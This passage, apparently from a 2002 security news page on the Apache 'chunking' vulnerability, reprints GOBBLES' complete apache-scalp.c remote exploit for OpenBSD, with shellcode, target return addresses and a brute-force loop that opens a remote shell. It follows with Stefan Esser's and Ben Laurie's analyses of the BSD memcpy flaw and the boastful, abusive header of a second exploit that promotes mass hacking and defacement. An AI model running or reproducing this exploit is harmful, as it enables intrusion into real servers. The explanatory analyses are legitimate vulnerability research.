	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	AAAAAAAAAAAAAAAAAAAAAAA=

	

	

	-Also-
	

	GOBBLES [http://www.bugtraq.org] security posted an exploit for  OpenBSD
	x86 :
	

	Attached  is  a  remote  Apache  1.3.X  exploit  for  the   \"chunking\"
	vulnerability. This version of the exploit works only on OpenBSD.  \"Experts\"
	have argued as to why this is not exploitable on x86/*nix. This  version
	of the exploit has been modified  to  convince  these  \"experts\"  that
	they   are   wrong.   Further,   it   is   very   ./friendly   and   all
	scriptkids/penetration testers should be able  to  run  it  without  any
	trouble.
	

	/*

	 * apache-scalp.c

	 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 

	 * 

	 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!

	 *

	 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!

	 * 

	 * \". . . and Doug Sniff said it was a hole in Epic.\"

	 *

	 * ---

	 * Disarm you with a smile

	 * And leave you like they left me here

	 * To wither in denial

	 * The bitterness of one who\'s left alone

	 * ---

	 *

	 * Remote OpenBSD/Apache exploit for the \"chunking\" vulnerability. Kudos to

	 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and

	 * their crappy memcpy implementation that makes this 32-bit impossibility

	 * very easy to accomplish. This vulnerability was recently rediscovered by a slew

	 * of researchers.

	 *

	 * The \"experts\" have already concurred that this bug...

	 *      -       Can not be exploited on 32-bit *nix variants

	 *      -       Is only exploitable on win32 platforms

	 *      -       Is only exploitable on certain 64-bit systems

	 *

	 * However, contrary to what ISS would have you believe, we have

	 * successfully exploited this hole on the following operating systems:

	 *

	 *      Sun Solaris 6-8 (sparc/x86)

	 *      FreeBSD 4.3-4.5 (x86)

	 *      OpenBSD 2.6-3.1 (x86)

	 *      Linux (GNU) 2.4 (x86)

	 *

	 * Don\'t get discouraged too quickly in your own research. It took us close

	 * to two months to be able to exploit each of the above operating systems.

	 * There is a peculiarity to be found for each operating system that makes the

	 * exploitation possible.

	 *

	 * Don\'t email us asking for technical help or begging for warez. We are

	 * busy working on many other wonderful things, including other remotely

	 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform

	 * the community that those holes don\'t exist? We wonder who\'s paying her.

	 *

	 * This code is an early version from when we first began researching the

	 * vulnerability. It should spawn a shell on any unpatched OpenBSD system

	 * running the Apache webserver.

	 *

	 * We appreciate The Blue Boar\'s effort to allow us to post to his mailing

	 * list once again. Because he finally allowed us to post, we now have this

	 * very humble offering.

	 *

	 * This is a very serious vulnerability. After disclosing this exploit, we

	 * hope to have gained immense fame and glory.

	 *

	 * Testbeds: synnergy.net, monkey.org, 9mm.com

	 *

	 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel

	 * bugs are great. 

	 *

	 * [#!GOBBLES QUOTES]

	 * 

	 * --- you just know 28923034839303 admins out there running

	 *     OpenBSD/Apache are going \"ugh..not exploitable..ill do it after the

	 *     weekend\"

	 * --- \"Five years without a remote hole in the default install\". default

	 *      package = kernel. if theo knew that talkd was exploitable, he\'d cry.

	 * --- so funny how apache.org claims it\'s impossible to exploit this.

	 * --- how many times were we told, \"ANTISEC IS NOT FOR YOU\" ?       

	 * --- I hope Theo doesn\'t kill himself                        

	 * --- heh, this is a middle finger to all those open source, anti-\"m$\"

	 *     idiots... slashdot hippies...

	 * --- they rushed to release this exploit so they could update their ISS

	 *     scanner to have a module for this vulnerability, but it doesnt even

	 *     work... it\'s just looking for win32 apache versions

	 * --- no one took us seriously when we mentioned this last year. we warned

	 *     them that moderation == no pie.

	 * --- now try it against synnergy :>                           

	 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM

	 *

	 * xxxx  this thing is a major exploit. do you really wanna publish it?

	 * oooo  i\'m not afraid of whitehats

	 * xxxx  the blackhats will kill you for posting that exploit

	 * oooo  blackhats are a myth

	 * oooo  so i\'m not worried

	 * oooo  i\'ve never seen one

	 * oooo  i guess it\'s sort of like having god in your life

	 * oooo  i don\'t believe there\'s a god

	 * oooo  but if i sat down and met him

	 * oooo  i wouldn\'t walk away thinking

	 * oooo  \"that was one hell of a special effect\"

	 * oooo  so i suppose there very well could be a blackhat somewhere

	 * oooo  but i doubt it... i\'ve seen whitehat-blackhats with their ethics

	 *       and deep philosophy...

	 *

	 * [GOBBLES POSERS/WANNABES]

	 *

	 * --- #!GOBBLES@EFNET (none of us join here, but we\'ve sniffed it)

	 * --- super@GOBBLES.NET (low-level.net)

	 *

	 * GOBBLES Security

	 * GOBBLES@hushmail.com

	 * http://www.bugtraq.org

	 *

	 */

	

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <unistd.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <arpa/inet.h>

	#include <netdb.h>

	#include <sys/time.h>

	#include <signal.h>

	

	

	#define EXPLOIT_TIMEOUT		5	/* num seconds to wait before assuming it failed */

	#define RET_ADDR_INC		512

	

	

	#define MEMCPY_s1_OWADDR_DELTA	-146

	#define PADSIZE_1		4

	#define PADSIZE_2 		5

	#define PADSIZE_3		7

	

	

	#define REP_POPULATOR		24

	#define REP_RET_ADDR		6

	#define REP_ZERO		36

	#define REP_SHELLCODE		24

	#define NOPCOUNT		1024

	

	#define NOP			0x41

	#define PADDING_1		\'A\'

	#define PADDING_2		\'B\'

	#define PADDING_3		\'C\'

	

	#define PUT_STRING(s)		memcpy(p, s, strlen(s)); p += strlen(s);

	#define PUT_BYTES(n, b)		memset(p, b, n); p += n;

	

	#define SHELLCODE_LOCALPORT_OFF 30

	

	char shellcode[] =

	  \"\\x89\\xe2\\x83\\xec\\x10\\x6a\\x10\\x54\\x52\\x6a\\x00\\x6a\\x00\\xb8\\x1f\"

	  \"\\x00\\x00\\x00\\xcd\\x80\\x80\\x7a\\x01\\x02\\x75\\x0b\\x66\\x81\\x7a\\x02\"

	  \"\\x42\\x41\\x75\\x03\\xeb\\x0f\\x90\\xff\\x44\\x24\\x04\\x81\\x7c\\x24\\x04\"

	  \"\\x00\\x01\\x00\\x00\\x75\\xda\\xc7\\x44\\x24\\x08\\x00\\x00\\x00\\x00\\xb8\"

	  \"\\x5a\\x00\\x00\\x00\\xcd\\x80\\xff\\x44\\x24\\x08\\x83\\x7c\\x24\\x08\\x03\"

	  \"\\x75\\xee\\x68\\x0b\\x6f\\x6b\\x0b\\x81\\x34\\x24\\x01\\x00\\x00\\x01\\x89\"

	  \"\\xe2\\x6a\\x04\\x52\\x6a\\x01\\x6a\\x00\\xb8\\x04\\x00\\x00\\x00\\xcd\\x80\"

	  \"\\x68\\x2f\\x73\\x68\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe2\\x31\\xc0\\x50\"

	  \"\\x52\\x89\\xe1\\x50\\x51\\x52\\x50\\xb8\\x3b\\x00\\x00\\x00\\xcd\\x80\\xcc\";

	

	

	struct {

		char *type;

		u_long retaddr;

	} targets[] = {	// hehe, yes theo, that say OpenBSD here!

		{ \"OpenBSD 3.0 x86 / Apache 1.3.20\",	0xcf92f },

		{ \"OpenBSD 3.0 x86 / Apache 1.3.22\",	0x8f0aa },

		{ \"OpenBSD 3.0 x86 / Apache 1.3.24\",	0x90600 },

		{ \"OpenBSD 3.1 x86 / Apache 1.3.20\",	0x8f2a6 },

		{ \"OpenBSD 3.1 x86 / Apache 1.3.23\",	0x90600 },

		{ \"OpenBSD 3.1 x86 / Apache 1.3.24\",	0x9011a },

		{ \"OpenBSD 3.1 x86 / Apache 1.3.24 #2\",	0x932ae },

	};

	

	

	int main(int argc, char *argv[]) {

	

		char           *hostp, *portp;

		unsigned char   buf[512], *expbuf, *p;

		int             i, j, lport;

		int             sock;

		int             bruteforce, owned, progress;

		u_long          retaddr;

		struct sockaddr_in sin, from;

	

	

		if(argc != 3) {

			printf(\"Usage: %s <target#|base address> <ip[:port]>\\n\", argv[0]);

			printf(\"  Using targets:\\t./apache-scalp 3 127.0.0.1:8080\\n\");

			printf(\"  Using bruteforce:\\t./apache-scalp 0x8f000 127.0.0.1:8080\\n\");

			printf(\"\\n--- --- - Potential targets list - --- ----\\n\");

			printf(\"Target ID / Target specification\\n\");

			for(i = 0; i < sizeof(targets)/8; i++)

				printf(\"\\t%d / %s\\n\", i, targets[i].type);

	

			return -1;

		}

	

	

		hostp = strtok(argv[2], \":\");

		if((portp = strtok(NULL, \":\")) == NULL)

			portp = \"80\";

	

		retaddr = strtoul(argv[1], NULL, 16);

		if(retaddr < sizeof(targets)/8) {

			retaddr = targets[retaddr].retaddr;

			bruteforce = 0;

		}

		else

			bruteforce = 1;

			

	

		srand(getpid());

		signal(SIGPIPE, SIG_IGN);

		for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

	

			/* skip invalid return adresses */

			i = retaddr & 0xff;

			if(i == 0x0a || i == 0x0d)

				retaddr++;

			else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))

				continue;

	

	

			sock = socket(AF_INET, SOCK_STREAM, 0);

			sin.sin_family = AF_INET;

			sin.sin_addr.s_addr = inet_addr(hostp);

			sin.sin_port = htons(atoi(portp));

			if(!progress)

				printf(\"\\n[*] Connecting.. \");

	

			fflush(stdout);

			if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {

				perror(\"connect()\");

				exit(1);

			}

	

			if(!progress)

				printf(\"connected!\\n\");

	

	

			/* Setup the local port in our shellcode */

			i = sizeof(from);

			if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {

				perror(\"getsockname()\");

				exit(1);

			}

	

			lport = ntohs(from.sin_port);

			shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;

			shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;

	

	

			p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)

					    + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));

	

			PUT_STRING(\"GET / HTTP/1.1\\r\\nHost: apache-scalp.c\\r\\n\");

	

			for (i = 0; i < REP_SHELLCODE; i++) {

				PUT_STRING(\"X-\");

				PUT_BYTES(PADSIZE_3, PADDING_3);

				PUT_STRING(\": \");

				PUT_BYTES(NOPCOUNT, NOP);

				memcpy(p, shellcode, sizeof(shellcode) - 1);

				p += sizeof(shellcode) - 1;

				PUT_STRING(\"\\r\\n\");

			}

	

			for (i = 0; i < REP_POPULATOR; i++) {

				PUT_STRING(\"X-\");

				PUT_BYTES(PADSIZE_1, PADDING_1);

				PUT_STRING(\": \");

				for (j = 0; j < REP_RET_ADDR; j++) {

					*p++ = retaddr & 0xff;

					*p++ = (retaddr >> 8) & 0xff;

					*p++ = (retaddr >> 16) & 0xff;

					*p++ = (retaddr >> 24) & 0xff;

				}

	

				PUT_BYTES(REP_ZERO, 0);

				PUT_STRING(\"\\r\\n\");

			}

	

			PUT_STRING(\"Transfer-Encoding: chunked\\r\\n\");

			snprintf(buf, sizeof(buf) - 1, \"\\r\\n%x\\r\\n\", PADSIZE_2);

			PUT_STRING(buf);

			PUT_BYTES(PADSIZE_2, PADDING_2);

			snprintf(buf, sizeof(buf) - 1, \"\\r\\n%x\\r\\n\", MEMCPY_s1_OWADDR_DELTA);

			PUT_STRING(buf);

	

			write(sock, expbuf, p - expbuf);

	

			progress++;

			if((progress%70) == 0)

				progress = 1;

	

			if(progress == 1) {

				memset(buf, 0, sizeof(buf));

				sprintf(buf, \"\\r[*] Currently using retaddr 0x%lx, length %u, localport %u\",

					retaddr, (unsigned int)(p - expbuf), lport);

				memset(buf + strlen(buf), \' \', 74 - strlen(buf));

				puts(buf);

				if(bruteforce)

					putchar(\';\');

			}

			else

				putchar((rand()%2)? \'P\': \'p\');

	

	

			fflush(stdout);

			while (1) {

				fd_set          fds;

				int             n;

				struct timeval  tv;

	

				tv.tv_sec = EXPLOIT_TIMEOUT;

				tv.tv_usec = 0;

	

				FD_ZERO(&fds);

				FD_SET(0, &fds);

				FD_SET(sock, &fds);

	

				memset(buf, 0, sizeof(buf));

				if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {

					if(FD_ISSET(sock, &fds)) {

						if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)

							break;

	

						if(!owned && n >= 4 && memcmp(buf, \"\\nok\\n\", 4) == 0) {

							printf(\"\\nGOBBLE GOBBLE!@#%%)*#\\n\");

							printf(\"retaddr 0x%lx did the trick!\\n\", retaddr);

							sprintf(expbuf, \"uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\\n\");

							write(sock, expbuf, strlen(expbuf));

							owned++;

						}

	

						write(1, buf, n);

					}

	

					if(FD_ISSET(0, &fds)) {

						if((n = read(0, buf, sizeof(buf) - 1)) < 0)

							exit(1);

	

						write(sock, buf, n);

					}

				}

	

				if(!owned)

					break;

			}

	

			free(expbuf);

			close(sock);

	

			if(owned)

				return 0;

	

			if(!bruteforce) {

				fprintf(stderr, \"Ooops.. hehehe!\\n\");

				return -1;

			}

		}

	

		return 0;

	}

	

	

	 Update (21 June 2002)

	 ======

	

	Stefan Esser of e-matters Security explains :
	

	I heard several people looking at the gobbles exploit and  believing  it
	can only be fake:
	

	here is my little explanation how bsd memcpy can be exploited:
	

	first a snipset of the bsd memcpy code:
	

	...

	1:

		addl	%ecx,%edi	/* copy backwards. */

		addl	%ecx,%esi

		std

	[1]	andl	$3,%ecx		/* any fractional bytes? */

		decl	%edi

		decl	%esi

		rep

		movsb

	[X]	movl	20(%esp),%ecx	/* copy remainder by words */

		shrl	$2,%ecx

		subl	$3,%esi

		subl	$3,%edi

		rep

		movsl

	...

	

	In Apache we trigger exactly this piece of  code:  bsd  thinks  the  two
	buffers are overlapping and so it wants to copy  backward.  The  problem
	is that you are able to overwrite  the  call  to  memcpy  including  the
	supplied paramters  (dst,  src,  length).  With  up  to  3  bytes  ([1])
	depending on alignment. if you align everything perfectly  you  can  set
	the 3 high bytes of length to zero and so change how many dwords  memcpy
	tries to copy in our case 0x000000?? This is only possible  because  the
	code reads the length param again from stack [X]...  This  way  you  can
	easily survive the call and  overwrite  the  saved  instruction  pointer
	before the memcpy call...
	

	- Then Ben Laurie comments on [http://www.apache-ssl.org/ben.html] -
	

	I should just point out the slight error in this  analysis  -  in  fact,
	the exploit only overwrites two bytes of the length  (incidentally,  the
	length is also constrained to be its own stack offset, leaving  no  room
	for manouver at all) - so the length is initially -146  (ffffff6e),  and
	after overwriting becomes 0000ff6e, copying  just  under  64k  onto  the
	stack, which is plenty for a standard stack-based shellcode exploit.
	

	Here\'s an analysis I wrote for iternal use at the ASF - it doesn\'t  go
	into detail on the shellcode (which is just the  usual  shellcode),  but
	does explain how  the  expected  SEGV  from  overrunning  the  stack  is
	avoided. Note that someone  (sorry,  forgotten  who)  posted  a  similar
	generic analyis a day or two ago - this one  was  independently  arrived
	at and refers to the Gobbles attack specifically.
	

	First, the exploit code  puts  stuff  on  the  stack  (legitimately,  in
	buffers). It then arranges a negative offset, as  previously  described,
	to be handed to memcpy. Here\'s where it gets cute. memcpy  has  memmove
	semantics  (i.e.,  it  copies  in  the  correct  direction   to   handle
	overlapping source/dest)  on  both  OpenBSD  and  FreeBSD  (in  fact,  I
	believe this is a requirement for this exploit to  work  on  any  system
	where the stack grows downwards).  As  a  result,  when  the  memcpy  is
	attempted,  it  is   done   backwards   (i.e.   the   copy   starts   at
	source+length-1 -> dest+length-1 and downwards for length  bytes).  Now,
	here\'s the cute bit. memmove (et al) are optimised to copy  in  4  byte
	chunks, for speed. This means that they have to copy the leftover  bytes
	separately. This is handled by copying the  odd  0-3  bytes  before  the
	remaining bytes.
	

	So, if you arrange for the negative offset of the  buffer  to  point  at
	where the length is stored on the stack, then when these odd  bytes  are
	copied, you can modify the length. What they do  is  modify  an  initial
	length of 0xffffxxxx to 0x0000xxxx - note that the length  is  also  the
	offset, so there is also a certain amount  of  luck  involved,  but  all
	that is needed is for the offset to be  small  enough  that  the  length
	remains big enough to zap enough  stack  (since  the  offset  is  a  few
	hundred, that leaves the length at near to 64k, which is plenty  to  zap
	a few return addresses). Then, when the length is  reloaded  to  do  the
	second copy, it is miraculously smaller (I  boggled  first  time  I  saw
	this in the debugger), and doesn\'t cause the expected SEGV,  just  nice
	corruption of the stack, as required![1]
	

	

	So, to illustrate with source:
	

	0x400f9d6c <memcpy>:    push   %esi

	0x400f9d6d <memcpy+1>:  push   %edi

	0x400f9d6e <memcpy+2>:  mov    0xc(%esp,1),%edi

	0x400f9d72 <memcpy+6>:  mov    0x10(%esp,1),%esi

	0x400f9d76 <memcpy+10>: mov    0x14(%esp,1),%ecx

	0x400f9d7a <memcpy+14>: cmp    %esi,%edi

	0x400f9d7c <memcpy+16>: jae    0x400f9d94 <memcpy+40>

	...

	

	at this point, we\'ve decided to go  backwards,  edi  is  dest,  esi  is
	source and ecx is count (aka -146 aka ffffff6e)
	

	0x400f9d94 <memcpy+40>: add    %ecx,%edi

	0x400f9d96 <memcpy+42>: add    %ecx,%esi

	

	Now we are pointing at the \"end\" of the buffers (i.e.  somewhere  down
	the stack from them, and, lo and behold, edi now points at  the  two  MS
	bytes of the count)
	

	0x400f9d98 <memcpy+44>: std

	0x400f9d99 <memcpy+45>: and    $0x3,%ecx

	

	calculate spare bytes (2 in this case)
	

	0x400f9d9c <memcpy+48>: dec    %edi

	0x400f9d9d <memcpy+49>: dec    %esi

	0x400f9d9e <memcpy+50>: repz movsb %ds:(%esi),%es:(%edi)

	

	and copy them - in fact two zeroes are copied,  so  the  length  is  now
	0000ff6e.
	

	0x400f9da0 <memcpy+52>: mov    0x14(%esp,1),%ecx

	

	load the length again (now ff6e)
	

	0x400f9da4 <memcpy+56>: shr    $0x2,%ecx

	

	divide by 4
	

	0x400f9da7 <memcpy+59>: sub    $0x3,%esi

	0x400f9daa <memcpy+62>: sub    $0x3,%edi

	0x400f9dad <memcpy+65>: repz movsl %ds:(%esi),%es:(%edi)

	

	and copy that many longs (i.e. just shy of 64k bytes). Here is where  we
	would have gone bang with a SEGV, but don\'t coz of the cunningness.
	

	0x400f9daf <memcpy+67>: mov    0xc(%esp,1),%eax

	0x400f9db3 <memcpy+71>: pop    %edi

	0x400f9db4 <memcpy+72>: pop    %esi

	0x400f9db5 <memcpy+73>: cld

	0x400f9db6 <memcpy+74>: ret

	

	return to a corrupted return address (or is it the next one  up  that\'s
	corrupted? not sure, don\'t care). And hey presto, remote shell.
	

	Note that glibc is _not_ vulnerable in this way, so I have no  idea  how
	the Linux attack works. I have not examined Solaris.
	

	[1] For those not familiar with this class  of  exploit,  the  stack  is
	corrupted such that the return address for some function call points  to
	code which spawns a shell, which is then used by the  attacker  to  have
	his or her evil way with your machine.
	

	

	 Update (24 June 2002)

	 ======

	

	The GOBBLES security team does it again [http://www.bugtraq.org] :
	

	There seems to be some confusion about whether or not this  bug  can  be
	exploited on any other operating systems than OpenBSD. Here\'s a  second
	version   of   our   private    exploit,    apache-massacre.c,    called
	apache-nosejob.c. Used  correctly,  it  will  successfully  exploit  any
	vulnerable Free/Net/OpenBSD (x86) machine.
	

	

	/*

	 * apache-nosejob.c - Now with FreeBSD & NetBSD targets ;>

	 *

	 * !! THIS EXPLOIT IS NOW PRIVATE ON BUGTRAQ !!

	 *

	 * USE BRUTE FORCE ! \"AUTOMATED SCRIPT KIDDY\" ! USE BRUTE FORCE !

	 *

	 * YEZ!$#@ YOU CAN EVEN DEFACE BUGTRAQ.ORG! 

	 *

	 * Your high priced security consultant\'s plane ticket: $1500

	 * Your high priced security consultant\'s time: $200/hour

	 * RealSecure nodes all over your company: $200,000

	 * Getting owned by 0day: Priceless

	 *  

	 * * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR * BEG FOR FAVOR *

	 * If somebody could do us a big favor and contact Jennifer Garner and ask

	 * her to make a journey to Vegas this summer for Defcon, to hang out with

	 * the members of GOBBLES Security who are all huge fans of hers, we would

	 * be eternally grateful.  We are 100% serious about this.  We would love 

	 * to have a chance to sit down and have a nice conversation with her during

	 * the conference -- something little to make our lives feel more complete.

	 *

	 * Just show her this picture, and she\'ll understand that we\'re not some

	 * crazy obsessive fanatical lunatics that she would want to avoid. ;-)

	 * 		http://phrack.org/summercon2002/GOBBLES_show.jpg

	 * We even promise to keep our clothes on!

	 *

	 * Thx to all those GOBBLES antagonizers. Your insults fuel our desire to

	 * work harder to gain more fame.

	 *

	 * This exploit brought to you by a tagteam effort between GOBBLES Security

	 * and ISS X-Forces.  ISS supplied the silly mathematical computations and

	 * other abstract figures declaring the exploitation of this bug to be 

	 * impossible, without factoring in the chance that there might be other

	 * conditions present that would allow exploitation.  After the failure of

	 * ISS\' Santa Claus, GOBBLES Security didn\'t want to disappoint the kids and

	 * the security consultants and have brought forth a brand new shiny toy for

	 * all to marvel at.

	 *

	 * GOBBLES Security Sex Force:  A lot of companies like to let you know

	 * their employees have the biggest dicks.  We\'re firm believers in the 

	 * idea that it\'s not the size of the wave, but rather the motion of the

	 * ocean -- we have no choice anyway.

	 * 

	 * 3APAPAPA said this can\'t be done on FreeBSD. He probably also thinks

	 * qmail can\'t be exploited remotely. Buzzz! There we go speaking through

	 * our asses again.  Anyways we\'re looking forward to his arguments on why

	 * this isn\'t exploitable on Linux and Solaris.  Lead, follow, or get the 

	 * fuck out of the way.

	 *

	 * Weigh the chances of us lying about the Linux version. Hmm, well so far

	 * we\'ve used a \"same shit, different smell\" approach on *BSD, so you could

	 * be forgiven for thinking we have no Linux version. Then bring in the

	 * reverse psychology factor of this paragraph that also says we don\'t have

	 * one. But we\'d say all of the above to make you believe us. This starts to

	 * get really complicated.

	 *

	 * --- 

	 * God knows I\'m helpless to speak

	 * On my own behalf

	 * God is as helpless as me

	 * Caught in the negatives

	 * We all just do as we please

	 * False transmissions

	 * I hope God forgives me

	 * For my transgressions

	 *

	 * It\'s what you want

	 * To know no consequences

	 * It\'s what you need

	 * To fucking bleed

	 * It\'s all too much

	 * ---

	 * 

	 * Changes:

	 * + can do hostname resolution

	 * + uses getopt() 

	 * + works against freebsd and netbsd now

	 * + ability to execute custom commands when shellcode replies -- great for

	 *   mass hacking

	 * + rand() value bitshifted for more randomness in our progress bar tongues

	 * + more targets ;> BUT REMEMBER BRUTE FORCE MODE!!!

	 * + [RaFa] complained that the first version didn\'t let him hack through

	 *   proxies.  New shellcode has been added for additional fun.  It\'s real

	 *   funky, monkey, do you trust?  Didn\'t think so.

	 *

	 * Fun to know:

	 * + Most apache installations don\'t even log the attack

	 * + GOBBLES Security is not playing games anymore.

	 * + GOBBLES Security has more active members than w00w00.

	 * + w00w00.org is still vulnerable to this exploit.

	 * + w00w00 might release another AIM advisory soon about how evil the

	 *   whole DMCA thing is.  *yawn*

	 * 

	 * Fun to do:

	 * + Spot the #openbsd operator who can figure out how to use this!

	 * + Join #snort and laugh at their inadequacies

	 * + Question the effectiveness of Project Honeynet, when they have yet

	 *   to discover the exploitation of a single \"0day\" vulnerability in the

	 *   wild.  HURRY UP B0YZ 4ND H4CK Y0UR 0WN H0N3YP0TZ N0W W1TH 4LL Y0UR

	 *   0DAY T0 PR0V3 US WR0NG!!@#  Dumb twats.

	 *

	 * 80% of #openbsd won\'t be patching Apache because:

	 * + \"It\'s not in the default install\"

	 * + \"It\'s only uid nobody. So what?\"

	 * + \"Our memcpy() implementation is not buggy\"

	 * + \"I couldn\'t get the exploit to work, so it must not actually be

	 *    exploitable.  Stupid GOBBLES wasting my time with nonsense\"

	 * + jnathan\'s expert advice to his peers is that \"this is not much of

	 *   a security issue\" -- @stake + w00w00 + snort brain power in action!

	 *

	 * Testbeds: hotmail.com, 2600.com, w00w00.org, efnet.org, atstake.com,

	 *	     yahoo.com, project.honeynet.org, pub.seastrom.com

	 *

	 * !! NOTICE TO CRITICS !! NOTICE TO CRITICS !! NOTICE TO CRITICS !!

	 * 

	 * If you\'re using this exploit against a vulnerable machine (that the

	 * exploit is supposed to work on, quit mailing us asking why apache-scalp

	 * doesn\'t work against Linux -- dumbasses) and it does not succeed, you

	 * will have to play with the r|d|z values and * BRUTEFORCE * BRUTEFORCE * 

	 * * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE * BRUTEFORCE *

	 * 

	 * We wrote this for ethical purposes only.  There is such a thing as an

	 * \"ethical hacker\" right?

	 *

	 * This should make penetration testing _very_ easy.  Go out and make some

	 * money off this, by exploiting the ignorance of some yahoo who will be

	 * easily ./impressed with your ability to use gcc.  No, we won\'t provide

	 * you with precompiled binaries.  Well, at least for *nix. ;-) 

	 *

	 * * IMPORTANT ANNOUCEMENT * IMPORTANT ANNOUNCEMENT * IMPORTANT ANNOUCEMENT *

	 * --- GOBBLES Security is no longer accepting new members.  We\'re now a 

	 *     closed group.  Of course, we\'ll still share our warez with the 

	 *     community at large, but for the time we have enough members.  

	 *

	 *     Greets to our two newest members:

	 *	-[RaFa], Ambassador to the Underworld

	 *	-pr0ix, Director of Slander and Misinformation

	 *

	 * [#!GOBBLES@SECRET_SERVER QUOTES]

	 *

	 * --- i wont be surprised that when I return tomorrow morning the

	 *     internet will have come to a grinding halt with people crying for

	 *     medics

	 * --- the internet will be over in a couple of months 

	 * --- nobody in #openbsd can get it to work... #netbsd people seem to be

	 *     managing fine...  

	 * --- they dont grasp the concept of the base address... i seriously

	 *     thought this was the most kiddie friendly exploit ever released

	 * --- even bb could get it working. look at vuln-dev

	 * --- we have to try to bump that threatcon up a notch

	 * --- what the alldas url now? how many defacements appeared yet?

	 * --- we should do a poem entitled \"default openbsd\" and mention how

	 *     it just sits there... inanimate... soon theo will be stripping the

	 *     network code so not even gobkltz.c works... as theo\'s paranoia

	 *     increases and he becomes out of sync with the real world, strange

	 *     things start to happen with openbsd...  CHANGELOG: \"now also safe

	 *     from the voices. 6 years without the screaming in the default

	 *     install\"

	 * --- i can port it to windows.. i can make a gui using mfc.. with

	 *     a picture of the skull & crossbones 

	 * --- Has anyone ever been caught by an IDS? I certainly never have.

	 *     This one runs on many machines. It ports to HP-UX.

	 * --- strange how mr spitzner didn\'t know honeynet.org was owned

	 * --- an official openbsd mirror is still vulnerable?  dear god they\'re

	 *     out of it!

	 * --- I think we\'re finally famous.

	 * --- we\'re on the front page of securityfocus, and we didn\'t even have 

	 *     to deface them!  too bad the article wasn\'t titled, \"Hi BlueBoar!\"

	 * --- we need GOBBLES group photos at defcon holding up signs that say

	 *     \"The Blue Boar Must Die\"

	 * --- project.honeynet.org is _still_ vulnerable a day after the exploit

	 *     was made public?  hahaha!

	 * --- exploit scanner?  www.google.com -- search for poweredby.gif + your

	 *     *bsd of choice!

	 * --- i stopped taking my antipsychotics last night.  say no 2 drugz!

	 * --- <GOBBLES> antiNSA -- HACKING IS NOT FOR YOU!!!!!!

	 * --- we wonder how much they\'ll like GeneralCuster.exe 

	 * --- wonder if ISS will use our code in their \"security assesment\" 

	 *     audits, or if they\'ll figure out how to exploit this independantly.

	 *     either way they\'re bound to make a lot of money off us, bastards.

	 * --- forget w00giving, this year itz thanksgiving.

	 * --- the traffic to netcraft.com/whats will be through the roof for the

	 *     next few months!

	 * --- every company with a hub has been sold multiple realsensor units

	 * --- full disclosure is a necessary evil, so quit your goddamned whining.

	 * --- people just assume they know what we mean by \"testbed\"

	 * --- i can\'t believe that people still disbelieve in the existance of 

	 *     hackers... i mean, what is all this bullshit about people being 

	 *     shocked that hackers write programs to break into systems so that

	 *     they can use those programs to break into systems?  are their minds

	 *     that small?

	 * --- we\'re far from done. . .

	 *

	 */

	

	/*

	 * apache-scalp.c

	 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 

	 * 

